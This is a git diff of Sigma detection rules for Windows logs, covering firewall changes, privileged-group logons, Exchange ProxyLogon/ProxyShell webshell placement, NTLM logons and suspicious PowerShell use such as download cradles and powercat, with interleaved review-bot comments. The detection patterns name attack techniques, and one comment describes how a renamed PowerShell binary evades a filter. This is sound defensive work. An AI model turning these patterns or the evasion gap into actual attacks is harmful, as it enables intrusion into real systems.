ApplicationPath|startswith: C:\Users\ ApplicationPath|contains: \AppData\Local\Programs\Opera\ ApplicationPath|endswith: \opera.exe - condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Any legitimate application that runs from the AppData user directory level: high diff --git a/sigma/builtin/firewall_as/win_firewall_as_change_rule.yml b/sigma/builtin/firewall_as/win_firewall_as_change_rule.yml index 4b85d7162..94121f62b 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_change_rule.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_change_rule.yml 
@@ -1,8 +1,7 @@ title: Firewall Rule Modified In The Windows Firewall Exception List id: 5570c4d9-8fdd-4622-965b-403a5a101aa0 status: experimental -description: Detects when a rule has been modified in the Windows firewall exception - list +description: Detects when a rule has been modified in the Windows firewall exception list references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113 @@ -19,8 +18,8 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2005 - - 2073 + - 2005 # A rule has been modified in the Windows Defender Firewall exception list (Windows 10) + - 2073 # A rule has been modified in the Windows Defender Firewall exception list. (Windows 11) filter_main_generic: ModifyingApplication|startswith: - C:\Program Files (x86)\ diff --git a/sigma/builtin/firewall_as/win_firewall_as_delete_all_rules.yml b/sigma/builtin/firewall_as/win_firewall_as_delete_all_rules.yml index b4fb134a7..f9ad02f30 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_delete_all_rules.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_delete_all_rules.yml @@ -1,8 +1,7 @@ title: All Rules Have Been Deleted From The Windows Firewall Configuration id: 79609c82-a488-426e-abcf-9f341a39365d status: experimental -description: Detects when a all the rules have been deleted from the Windows Defender - Firewall configuration +description: Detects when a all the rules have been deleted from the Windows Defender Firewall configuration references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113, Nasreddine Bencherchali (Nextron Systems) 
@@ -19,8 +18,8 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2033 - - 2059 + - 2033 # All rules have been deleted from the Windows Defender Firewall configuration on this computer + - 2059 # All rules have been deleted from the Windows Defender Firewall configuration on this computer. (Windows 11) filter_main_generic: ModifyingApplication|startswith: - C:\Program Files\ @@ -30,7 +29,6 @@ detection: filter_optional_msmpeng: ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ ModifyingApplication|endswith: \MsMpEng.exe - condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) level: high ruletype: Sigma diff --git a/sigma/builtin/firewall_as/win_firewall_as_delete_rule.yml b/sigma/builtin/firewall_as/win_firewall_as_delete_rule.yml index 4fe8dec1b..40f5dc95b 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_delete_rule.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_delete_rule.yml @@ -1,8 +1,7 @@ title: A Rule Has Been Deleted From The Windows Firewall Exception List id: c187c075-bb3e-4c62-b4fa-beae0ffc211f status: experimental -description: Detects when a single rules or all of the rules have been deleted from - the Windows Defender Firewall +description: Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113 
@@ -19,8 +18,8 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2006 - - 2052 + - 2006 # A rule has been deleted in the Windows Defender Firewall exception list + - 2052 # A rule has been deleted in the Windows Defender Firewall exception list. (Windows 11) filter_main_generic: ModifyingApplication|startswith: - C:\Program Files\ @@ -31,10 +30,9 @@ detection: ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ ModifyingApplication|endswith: \MsMpEng.exe filter_main_null: - ModifyingApplication: null + ModifyingApplication: filter_main_empty: ModifyingApplication: '' - condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) level: medium ruletype: Sigma diff --git a/sigma/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml b/sigma/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml index 4a9c37377..101598083 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml @@ -1,8 +1,7 @@ title: The Windows Defender Firewall Service Failed To Load Group Policy id: 7ec15688-fd24-4177-ba43-1a950537ee39 status: test -description: Detects activity when The Windows Defender Firewall service failed to - load Group Policy +description: Detects activity when The Windows Defender Firewall service failed to load Group Policy references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113 @@ -18,7 +17,7 @@ detection: firewall_as: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: - EventID: 2009 + EventID: 2009 # The Windows Defender Firewall service failed to load Group Policy condition: firewall_as and selection level: low ruletype: Sigma 
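Review bot: `filter_main_null` now reads `ModifyingApplication:` with no value, which YAML still parses as null but no longer says so, and next to `filter_main_empty: ModifyingApplication: ''` it looks like a truncated line rather than a deliberate null test. The explicit `ModifyingApplication: null` form is the one the Sigma specification uses for "field is absent" and is easier to read and diff. Suggest keeping `ModifyingApplication: null`; if the converter that produced this file strips `null` on purpose, a comment such as `ModifyingApplication: # null: field absent from the event` would make the intent visible.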
diff --git a/sigma/builtin/firewall_as/win_firewall_as_reset_config.yml b/sigma/builtin/firewall_as/win_firewall_as_reset_config.yml index 12a183d3e..802f9f5bb 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_reset_config.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_reset_config.yml @@ -1,8 +1,7 @@ title: Windows Defender Firewall Has Been Reset To Its Default Configuration id: 04b60639-39c0-412a-9fbe-e82499c881a3 status: experimental -description: Detects activity when Windows Defender Firewall has been reset to its - default configuration +description: Detects activity when Windows Defender Firewall has been reset to its default configuration references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113 @@ -19,8 +18,8 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2032 - - 2060 + - 2032 # Windows Defender Firewall has been reset to its default configuration + - 2060 # Windows Defender Firewall has been reset to its default configuration. (Windows 11) condition: firewall_as and selection level: low ruletype: Sigma diff --git a/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml b/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml index ad81ffcb9..2802ecf9a 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml 
@@ -1,8 +1,7 @@ title: Windows Firewall Settings Have Been Changed id: 00bb5bd5-1379-4fcf-a965-a5b6f7478064 status: experimental -description: Detects activity when the settings of the Windows firewall have been - changed +description: Detects activity when the settings of the Windows firewall have been changed references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -19,11 +18,12 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2002 - - 2083 - - 2003 - - 2082 - - 2008 + - 2002 # A Windows Defender Firewall setting has changed. + - 2083 # A Windows Defender Firewall setting has changed. (Windows 11) + - 2003 # A Windows Firewall setting in the profile has changed + - 2082 # A Windows Defender Firewall setting in the %1 profile has changed. (Windows 11) + - 2008 # Windows Firewall Group Policy settings have changed. The new settings have been applied + # - 2010 # Network profile changed on an interface. condition: firewall_as and selection level: low ruletype: Sigma diff --git a/sigma/builtin/lsa_server/win_lsa_server_normal_user_admin.yml b/sigma/builtin/lsa_server/win_lsa_server_normal_user_admin.yml index a0d97ff18..3b94568d0 100644 --- a/sigma/builtin/lsa_server/win_lsa_server_normal_user_admin.yml +++ b/sigma/builtin/lsa_server/win_lsa_server_normal_user_admin.yml 
@@ -1,8 +1,7 @@ title: Standard User In High Privileged Group id: 7ac407cc-0f48-4328-aede-de1d2e6fef41 status: experimental -description: Detect standard users login that are part of high privileged groups such - as the Administrator group +description: Detect standard users login that are part of high privileged groups such as the Administrator group references: - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers - https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection 
@@ -16,28 +15,25 @@ tags: logsource: product: windows service: lsa-server - definition: 'Requirements: Microsoft-Windows-LSA/Operational (199FE037-2B82-40A9-82AC-E1D46C792B99) - Event Log must be enabled and collected in order to use this rule.' + definition: 'Requirements: Microsoft-Windows-LSA/Operational (199FE037-2B82-40A9-82AC-E1D46C792B99) Event Log must be enabled and collected in order to use this rule.' detection: lsa_server: Channel: Microsoft-Windows-LSA/Operational selection: EventID: 300 - TargetUserSid|startswith: S-1-5-21- + TargetUserSid|startswith: S-1-5-21- # Standard user SidList|contains: - - S-1-5-32-544 - - -500} - - -518} - - -519} + - S-1-5-32-544 # Local admin + - -500} # Domain admin + - -518} # Schema admin + - -519} # Enterprise admin filter_main_admin: TargetUserSid|endswith: - - '-500' - - '-518' - - '-519' + - '-500' # Domain admin + - '-518' # Schema admin + - '-519' # Enterprise admin condition: lsa_server and (selection and not 1 of filter_main_*) falsepositives: - - Standard domain users who are part of the administrator group. These users shouldn't - have these right. But in the case where it's necessary. They should be filtered - out using the "TargetUserName" field + - Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the "TargetUserName" field level: medium ruletype: Sigma diff --git a/sigma/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml b/sigma/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml index 8ff3c4acd..e568c3cfc 100644 --- a/sigma/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml +++ b/sigma/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml 
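Review bot: The new SID comments in `selection` and `filter_main_admin` are partly wrong: RID `-500` is the built-in domain Administrator account, not "Domain admin", and `S-1-5-32-544` is the BUILTIN\Administrators group, not a "local admin" user. Suggested wording: `- -500} # Built-in Administrator account (RID 500)` and `- S-1-5-32-544 # BUILTIN\Administrators group`, with the matching fix on the `filter_main_admin` entry. Note also that the Domain Admins group (RID 512) does not appear in `SidList|contains`, so if membership in that group is meant to trigger this rule, `- -512}` would need adding — verify against the rule's intent before changing the detection logic.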
@@ -1,8 +1,7 @@ title: ProxyLogon MSExchange OabVirtualDirectory id: 550d3350-bb8a-4ff3-9533-2ba533f4a1c0 status: test -description: Detects specific patterns found after a successful ProxyLogon exploitation - in relation to a Commandlet invocation of Set-OabVirtualDirectory +description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory references: - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml b/sigma/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml index e2fd6bd96..c7a6ff616 100644 --- a/sigma/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml +++ b/sigma/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml @@ -1,8 +1,7 @@ title: Certificate Request Export to Exchange Webserver id: b7bc7038-638b-4ffd-880c-292c692209ef status: test -description: Detects a write of an Exchange CSR to an untypical directory or with - aspx name suffix which can be used to place a webshell +description: Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell references: - https://twitter.com/GossiTheDog/status/1429175908905127938 author: Max Altgelt (Nextron Systems) diff --git a/sigma/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml b/sigma/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml index 60409737c..0dfbc92a9 100644 --- a/sigma/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml +++ b/sigma/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml 
@@ -1,9 +1,7 @@ title: Mailbox Export to Exchange Webserver id: 516376b4-05cd-4122-bae0-ad7641c38d48 status: experimental -description: Detects a successful export of an Exchange mailbox to untypical directory - or with aspx name suffix which can be used to place a webshell or the needed role - assignment for it +description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it references: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html author: Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems) @@ -23,7 +21,7 @@ detection: - New-MailboxExportRequest - ' -Mailbox ' export_params: - - -FilePath "\\\\ + - -FilePath "\\\\ # We care about any share location. - .aspx role_assignment: '|all': diff --git a/sigma/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml b/sigma/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml index 946cfba8b..e7eaf15f0 100644 --- a/sigma/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml +++ b/sigma/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml @@ -1,8 +1,7 @@ title: Remove Exported Mailbox from Exchange Webserver id: 09570ae5-889e-43ea-aac0-0e1221fb3d95 status: test -description: Detects removal of an exported Exchange mailbox which could be to cover - tracks from ProxyShell exploit +description: Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit references: - https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430 author: Christian Burkard (Nextron Systems) 
diff --git a/sigma/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml b/sigma/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml index 846b68cb6..4f0dcfbe6 100644 --- a/sigma/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml +++ b/sigma/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml @@ -1,8 +1,7 @@ title: Exchange Set OabVirtualDirectory ExternalUrl Property id: 9db37458-4df2-46a5-95ab-307e7f29e675 status: test -description: Rule to detect an adversary setting OabVirtualDirectory External URL - property to a script in Exchange Management log +description: Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log references: - https://twitter.com/OTR_Community/status/1371053369071132675 author: Jose Rodriguez @Cyb3rPandaH diff --git a/sigma/builtin/msexchange/win_exchange_transportagent.yml b/sigma/builtin/msexchange/win_exchange_transportagent.yml index a7340d9e3..e63790992 100644 --- a/sigma/builtin/msexchange/win_exchange_transportagent.yml +++ b/sigma/builtin/msexchange/win_exchange_transportagent.yml @@ -1,8 +1,8 @@ title: MSExchange Transport Agent Installation - Builtin id: 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6 related: - - id: 83809e84-4475-4b69-bc3e-4aad8568612f - type: derived + - id: 83809e84-4475-4b69-bc3e-4aad8568612f + type: derived status: test description: Detects the Installation of a Exchange Transport Agent references: @@ -25,7 +25,6 @@ detection: fields: - AssemblyPath falsepositives: - - Legitimate installations of exchange TransportAgents. AssemblyPath is a good - indicator for this. + - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. level: medium ruletype: Sigma diff --git a/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml b/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml index a6f2b3f03..e9f0f1fcb 100644 
--- a/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml +++ b/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml @@ -13,6 +13,7 @@ tags: logsource: service: msexchange-management product: windows + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: msexchange_management: Channel: MSExchange Management @@ -23,7 +24,6 @@ detection: fields: - AssemblyPath falsepositives: - - Legitimate installations of exchange TransportAgents. AssemblyPath is a good - indicator for this. + - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. level: high ruletype: Sigma diff --git a/sigma/builtin/ntlm/win_susp_ntlm_auth.yml b/sigma/builtin/ntlm/win_susp_ntlm_auth.yml index 9534a89f9..a492efb29 100644 --- a/sigma/builtin/ntlm/win_susp_ntlm_auth.yml +++ b/sigma/builtin/ntlm/win_susp_ntlm_auth.yml @@ -1,8 +1,7 @@ title: NTLM Logon id: 98c3bcf1-56f2-49dc-9d8d-c66cf190238b status: test -description: Detects logons using NTLM, which could be caused by a legacy source or - attackers +description: Detects logons using NTLM, which could be caused by a legacy source or attackers references: - https://twitter.com/JohnLaTwC/status/1004895028995477505 - https://goo.gl/PsqrhT @@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-NTLM/Operational selection: EventID: 8002 - ProcessName|contains: '*' + ProcessName|contains: '*' # We use this to avoid false positives with ID 8002 on other log sources if the logsource isn't set correctly condition: ntlm and selection falsepositives: - Legacy hosts diff --git a/sigma/builtin/ntlm/win_susp_ntlm_rdp.yml b/sigma/builtin/ntlm/win_susp_ntlm_rdp.yml index 2cccd4027..4c4d8618d 100644 --- a/sigma/builtin/ntlm/win_susp_ntlm_rdp.yml +++ b/sigma/builtin/ntlm/win_susp_ntlm_rdp.yml 
@@ -1,8 +1,7 @@ title: Potential Remote Desktop Connection to Non-Domain Host id: ce5678bb-b9aa-4fb5-be4b-e57f686256ad status: test -description: Detects logons using NTLM to hosts that are potentially not part of the - domain. +description: Detects logons using NTLM to hosts that are potentially not part of the domain. references: - n/a author: James Pemberton diff --git a/sigma/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml b/sigma/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml index 9af9445cc..eaeba31a3 100644 --- a/sigma/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml +++ b/sigma/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml @@ -1,8 +1,7 @@ title: OpenSSH Server Listening On Socket id: 3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781 status: test -description: Detects scenarios where an attacker enables the OpenSSH server and server - starts to listening on SSH socket. +description: Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket. references: - https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH - https://winaero.com/enable-openssh-server-windows-10/ diff --git a/sigma/builtin/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml b/sigma/builtin/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml index e9fe3b5cb..d797a018b 100644 --- a/sigma/builtin/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml +++ b/sigma/builtin/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'echo ' - '%userdomain%' condition: process_creation and selection 
diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml index 97a11e91a..513134746 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml @@ -1,11 +1,10 @@ title: Nslookup PowerShell Download Cradle id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 related: - - id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23 - type: similar + - id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23 + type: similar status: test -description: Detects a powershell download cradle using nslookup. This cradle uses - nslookup to extract payloads from DNS records. +description: Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records. references: - https://twitter.com/Alh4zr3d/status/1566489367232651264 author: Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml index 3dfd06713..7367c58d9 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml @@ -27,7 +27,6 @@ detection: - Remove-WmiObject condition: ps_classic_start and selection falsepositives: - - Legitimate Administrator deletes Shadow Copies using operating systems utilities - for legitimate reason + - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason level: high ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_downgrade_attack.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_downgrade_attack.yml index be9fb3d77..02cf64630 100644 
--- a/sigma/builtin/powershell/powershell_classic/posh_pc_downgrade_attack.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_downgrade_attack.yml @@ -1,8 +1,7 @@ title: PowerShell Downgrade Attack - PowerShell id: 6331d09b-4785-4c13-980f-f96661356249 status: test -description: Detects PowerShell downgrade attack by comparing the host versions with - the actually used engine version 2.0 +description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 references: - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ author: Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements) diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_exe_calling_ps.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_exe_calling_ps.yml index c0ebb4a65..fca9f019a 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_exe_calling_ps.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_exe_calling_ps.yml @@ -1,8 +1,7 @@ title: PowerShell Called from an Executable Version Mismatch id: c70e019b-1479-4b65-b0cc-cd0c6093a599 status: test -description: Detects PowerShell called from an executable by the version mismatch - method +description: Detects PowerShell called from an executable by the version mismatch method references: - https://adsecurity.org/?p=2921 author: Sean Metcalf (source), Florian Roth (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_powercat.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_powercat.yml index 657b339a2..539f5400e 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_powercat.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_powercat.yml 
@@ -1,11 +1,10 @@ title: Netcat The Powershell Version id: c5b20776-639a-49bf-94c7-84f912b91c15 related: - - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 - type: derived + - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 + type: derived status: test -description: Adversaries may use a non-application layer protocol for communication - between host and C2 server or among infected hosts within a network +description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ - https://github.com/besimorhino/powercat diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_remote_powershell_session.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_remote_powershell_session.yml index f2b100951..0c391bf5c 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_remote_powershell_session.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_remote_powershell_session.yml @@ -1,8 +1,8 @@ title: Remote PowerShell Session (PS Classic) id: 60167e5c-84b2-4c95-a7ac-86281f27c445 related: - - id: 96b9f619-aa91-478f-bacb-c3e50f8df575 - type: derived + - id: 96b9f619-aa91-478f-bacb-c3e50f8df575 + type: derived status: test description: Detects remote PowerShell sessions references: @@ -29,5 +29,6 @@ detection: condition: ps_classic_start and selection falsepositives: - Legitimate use remote PowerShell sessions +# Note: Increase the level to "medium" in environments that do not leverage PowerShell remoting level: low ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml index 6fdf25fac..5fffd170b 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml 
@@ -1,17 +1,14 @@ title: Potential RemoteFXvGPUDisablement.EXE Abuse id: f65e22f9-819e-4f96-9c7b-498364ae7a25 related: - - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 - type: similar - - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 - type: similar - - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 - type: similar + - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation + type: similar + - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module + type: similar + - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock + type: similar status: test -description: Detects PowerShell module creation where the module Contents are set - to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential - abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable - to module load-order hijacking. +description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 @@ -29,8 +26,7 @@ detection: powershell_classic: Channel: Windows PowerShell selection: - Data|contains: ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter - { + Data|contains: ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter { condition: powershell_classic and selection falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_renamed_powershell.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_renamed_powershell.yml index 4de246c05..3538f3d78 100644 
--- a/sigma/builtin/powershell/powershell_classic/posh_pc_renamed_powershell.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_renamed_powershell.yml @@ -19,11 +19,13 @@ detection: Channel: Windows PowerShell selection: Data|contains: HostName=ConsoleHost + # Note: Powershell Logging Data is localized. Meaning that "HostApplication" field will be translated to a different field on a non english layout. This rule doesn't take this into account due to the sheer ammount of possibilities. It's up to the user to add these cases. filter_main_ps: Data|contains: - HostApplication=powershell - HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell - HostApplication=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell + # In some cases powershell was invoked with inverted slashes - HostApplication=C:/Windows/System32/WindowsPowerShell/v1.0/powershell - HostApplication=C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell condition: ps_classic_start and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_download.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_download.yml index fbf0ce474..ec38f3c39 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_download.yml +++ b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_download.yml @@ -1,8 +1,8 @@ title: Suspicious PowerShell Download id: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d related: - - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 - type: derived + - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 + type: derived status: test description: Detects suspicious PowerShell download command references: diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml index bf6b6da7f..e347f9813 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml 
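Review bot: The new localization note has a typo (`ammount` → `amount`) and should also state the consequence: on a non-English host none of the `HostApplication=` filters match, so the rule becomes noisy for legitimate PowerShell rather than blind, and the note should say which of the two it is. Separately, `Data|contains: HostApplication=powershell` appears to be a prefix match on the host application string, so a renamed copy launched from the current directory under a name that merely starts with `powershell` (e.g. `powershell_.exe`) is also filtered out; if that is not intended, tightening the first entry to `HostApplication=powershell.exe` and `'HostApplication=powershell '` (quoted, with the trailing space) would keep the legitimate forms while closing the gap — verify against sample events before changing the filter.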
+++ b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml @@ -1,9 +1,7 @@ title: Use Get-NetTCPConnection id: b366adb4-d63d-422d-8a2c-186463b5ded0 status: test -description: Adversaries may attempt to get a listing of network connections to or - from the compromised system they are currently accessing or from remote systems - by querying for information over the network. +description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell author: frack113 diff --git a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_zip_compress.yml b/sigma/builtin/powershell/powershell_classic/posh_pc_susp_zip_compress.yml index af243f62d..43333995f 100644 --- a/sigma/builtin/powershell/powershell_classic/posh_pc_susp_zip_compress.yml +++ 